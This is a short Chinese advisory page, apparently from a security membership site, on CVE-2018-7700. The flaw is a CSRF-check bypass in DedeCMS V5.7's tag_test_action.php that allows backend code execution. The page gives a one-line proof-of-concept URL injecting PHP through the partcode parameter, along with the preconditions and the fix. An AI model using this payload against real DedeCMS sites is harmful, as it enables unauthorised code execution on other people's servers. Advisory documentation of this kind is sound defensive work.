Dedecms V5.7后台任意代码执行CVE-2018-7700-棉花糖会员站

# Dedecms V5.7后台任意代码执行CVE-2018-7700

## 漏洞简介

该漏洞的触发文件为 /dede/tag\_test\_action.php。起因是 csrf\_check() 函数的绕过，导致可执行任意代码。

## POC

“`
http://localhost/后台地址/tag_test_action.php?url=a&token=&partcode={dede:field name=’source’ runphp=’yes’}phpinfo();{/dede:field}
“`

![](/static/baige/01-CMS漏洞/DedeCMS/Dedecms%20V5.7%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8CCVE-2018-7700/20180328005501-96c638a6-31df-1.png)

## 利用条件

登录后台

## 解决方案

重新实现 csrf\_check() 函数

## 参考来源

先知社区：https://xz.aliyun.com/t/2224

文章版权归作者所有，未经允许请勿转载。

THE END

漏洞库

Dedecms V5.7后台任意代码执行CVE-2018-7700

请登录后发表评论

1⾦蝶OA /KingdeeOA/PostilUpload 任意⽂件上传

2明洞 mingdon 0.2.7版本分享

3SPON IP网络对讲广播系统 /php/rj_get_token.php 任意文件读取

4202504-OSCP考试退役真题53台单机解法

5CRTP-红队专家认证课程-2025.10 中英双语字幕

6会员站年终抽奖清单出炉！万元奖品在等你哦~